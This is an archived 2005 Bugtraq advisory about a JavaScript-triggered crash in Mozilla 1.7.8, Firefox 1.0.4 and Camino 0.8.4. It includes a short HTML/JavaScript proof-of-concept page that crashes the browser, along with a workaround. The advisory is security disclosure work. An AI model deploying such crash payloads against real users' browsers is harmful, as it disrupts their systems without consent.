lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <42C2F54C.60904@kurczaba.com>
Date: Wed, 29 Jun 2005 15:23:56 -0400
From: Kurczaba Associates Advisories <advisories@...czaba.com>
To: bugtraq@...urityfocus.com
Subject: Mozilla Multiple Product JavaScript Issue


Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------

Vendor:
Mozilla (http://www.mozilla.org)

Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4

Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to 
crash the above named browsers. The script can be executed both with and 
without user intervention.

Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
	//Run the function 20000 times
		for (a = 0; a <= 20000; a++)
		{
			//Here is the special code that terminates the browser
			function(){};
		}
	//Displays an alert to notify the user if the browser is not vulnerable.
		alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----


Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm

Workaround:
Disable JavaScript

Date Discovered:
June 14, 2005

Severity:
Low

Credit:
Paul Kurczaba



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ